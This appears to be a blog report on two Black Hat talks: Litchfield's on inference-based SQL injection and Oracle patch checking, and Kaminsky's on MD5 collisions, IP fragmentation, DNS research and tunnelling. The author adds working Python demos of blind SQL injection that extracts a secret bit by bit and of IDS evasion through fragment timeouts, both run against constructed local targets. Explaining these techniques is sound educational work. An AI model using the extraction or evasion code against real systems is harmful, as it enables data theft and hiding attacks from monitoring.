Blackhat Day 1: Litchfield and Kaminsky

by Derek Vadala

Attended David Litchfield's talk, All New 0-day, this morning. His talk was split into two mini talks, the first covering what he calls SQL Injection and Data Mining Through Inference. The idea is an offshoot of SQL timing attacks, but instead of measuring delays it uses boolean logic inside the injected query to produce arbitrary but meaningful errors. By forcing predictable, boolean errors, or really any distinguishable output, he is able to recover the actual data held by the database one true/false answer (one bit) at a time, even when the application never displays query results.
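To make the inference technique concrete, here is an added example (my own code, not Litchfield's, and not taken from his slides). It builds a constructed SQLite database with a made-up secret, wraps it in a hypothetical application that concatenates user input into a query and leaks only "user found / not found", and then recovers the hidden column bit by bit through that one-bit channel. Litchfield's talk forced database errors as the signal; this example uses "row returned or not", which is the same trick over a different output, and the table, column and secret are all invented for the demo.

```python
import sqlite3

SECRET = "S3cret!"  # constructed sample data, not anything from the talk


def build_db():
    """Constructed sample: one table the attacker cannot read directly."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', ?)", (SECRET,))
    return db


class VulnerableApp:
    """Hypothetical app that concatenates input into SQL and shows no data;
    the only thing it leaks is whether the query matched a row."""

    def __init__(self, db):
        self.db = db
        self.queries = 0  # how many yes/no answers the attacker needed

    def user_exists(self, name):
        self.queries += 1
        sql = f"SELECT 1 FROM users WHERE name = '{name}'"  # the injection bug
        try:
            return self.db.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False  # errors are swallowed; still a one-bit signal


def ask(app, condition):
    """Turn one SQL predicate into one bit of output: close the literal,
    AND our predicate onto a row we know exists, comment out the rest."""
    return app.user_exists(f"alice' AND ({condition}) -- ")


def infer_length(app, column, max_len=64):
    """Binary search on length(column) using only yes/no answers."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(app, f"length({column}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def infer_string(app, column, bits=7):
    """Recover the column one bit at a time: for character i and bit b,
    ask whether bit b of the code point of character i is set."""
    n = infer_length(app, column)
    out = []
    for i in range(1, n + 1):
        code = 0
        for b in range(bits):
            if ask(app, f"(unicode(substr({column}, {i}, 1)) >> {b}) & 1 = 1"):
                code |= 1 << b
        out.append(chr(code))
    return "".join(out)


def demo():
    """Run the attack against the constructed app; returns (secret, query count)."""
    app = VulnerableApp(build_db())
    return infer_string(app, "password"), app.queries


if __name__ == "__main__":
    secret, n = demo()
    print(f"recovered {secret!r} with {n} yes/no queries")
```

The cost is bounded and predictable: a handful of queries for the length, then seven per character for ASCII, which is why an attacker who can only see a binary outcome (error or no error, row or no row) still walks away with the whole column.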

The second part of his talk, Oracle Patching and Knowing If You Are Not, focused on techniques for determining whether vendor patches actually fix what they claim to. While it focused on Oracle, I'm sure these techniques could be easily applied to other applications and platforms. His slides and a whitepaper are forthcoming.

Dan Kaminsky covered a wide range of topics. First he showed an example of two web pages that yield the same MD5 sum, which is already on his site.

Next, he explained some issues with IP fragmentation, illustrating how he exploits the disparity between IDS and host reassembly timeouts: because the two hold fragments for different lengths of time, the same fragmented data stream is reassembled by the IDS into one payload (noise) and by the host into a different one (the attack).
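The following is an added simulation of that timeout disparity, written by me rather than taken from Kaminsky's talk. It models two reassembly queues, one for the host and one for the IDS, each with its own timeout and a "first fragment wins" rule for overlapping data, then replays a constructed three-fragment timeline against both. The timeouts (30 s for the host, 60 s for the sensor), the datagram ID, and the "attack" bytes are all illustrative assumptions; real stacks also differ in how they resolve overlaps, which this model reduces to one switch.

```python
from dataclasses import dataclass, field

HOST_TIMEOUT = 30.0  # illustrative: a host that drops partial datagrams after 30 s
IDS_TIMEOUT = 60.0   # illustrative: a sensor that holds fragments twice as long


@dataclass
class Fragment:
    """One IP fragment: datagram id, byte offset, payload, More-Fragments flag,
    and the (constructed) time it hits the wire."""
    ident: int
    offset: int
    data: bytes
    mf: bool
    sent_at: float


@dataclass
class Reassembler:
    """Minimal reassembly queue. Datagrams older than `timeout` are dropped;
    on an overlap at the same offset, policy 'first' keeps the queued data
    and 'last' lets the newest fragment replace it."""
    name: str
    timeout: float
    policy: str = "first"
    queue: dict = field(default_factory=dict)  # ident -> [first_seen, {offset: Fragment}]

    def feed(self, frag):
        """Queue one fragment; return the reassembled bytes when complete, else None."""
        expired = [i for i, (t0, _) in self.queue.items() if frag.sent_at - t0 > self.timeout]
        for ident in expired:
            del self.queue[ident]
        _, parts = self.queue.setdefault(frag.ident, [frag.sent_at, {}])
        if frag.offset in parts and self.policy == "first":
            return None  # overlap: keep what we already have
        parts[frag.offset] = frag
        return self._try_complete(frag.ident)

    def _try_complete(self, ident):
        _, parts = self.queue[ident]
        buf, pos, last = b"", 0, None
        for off in sorted(parts):
            if off != pos:
                return None  # hole in the datagram
            last = parts[off]
            buf += last.data
            pos += len(last.data)
        if last.mf:
            return None  # tail not seen yet
        del self.queue[ident]
        return buf


def evasion_run():
    """Replay a constructed timeline against both reassemblers and return
    what each one believes the datagram contained."""
    host = Reassembler("host", HOST_TIMEOUT)
    ids = Reassembler("ids", IDS_TIMEOUT)
    # Both heads are 16 bytes so the tail lines up at offset 16 either way.
    head_noise = Fragment(0x1234, 0, b"GET /index.html ", True, sent_at=0.0)
    head_attack = Fragment(0x1234, 0, b"GET /cgi-bin/bad", True, sent_at=40.0)  # stand-in payload
    tail = Fragment(0x1234, 16, b" HTTP/1.0\r\n\r\n", False, sent_at=41.0)
    seen = {}
    for r in (host, ids):
        for frag in (head_noise, head_attack, tail):
            result = r.feed(frag)
            if result is not None:
                seen[r.name] = result
    return seen


if __name__ == "__main__":
    for who, payload in evasion_run().items():
        print(f"{who:4s} reassembled: {payload!r}")
```

At t=40 the host has already expired the noise head, so the attack head starts a fresh datagram and the tail completes it; the IDS still holds the noise head, rejects the overlapping attack head, and reassembles noise. One stream, two different datagrams, and the sensor inspects the harmless one.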

He went on to explain that he had been given access to a really large pipe on which he is able to conduct Internet-scale research. His first target: trust relationships in the DNS infrastructure, especially noting the reflexiveness involved in PTR lookups (a server that reverse-resolves the address of whoever queries it reveals which resolver it trusts to do so) as well as the arbitrary, but predictable, UDP source ports left open by client queries. He also alluded to, but didn't disclose, some major concerns he has detected.

After that, he illustrated a rapid network mapping project in which he was able to incorporate real-time traceroute data into an Internet map using the Boost Graph Library (BGL). He didn't go into a lot of detail on how the visualizations were created, but in my quick assessment, his prototype already seemed worlds ahead of the "mapping" features that most SIM (security event correlation) vendors tout. It was hard to tell how much of that was due to the BGL and how much to the data set.

He ended with a demo of a 64 KB/s video feed tunneled through DNS: Lord of the Dance/Sith from Adult Swim.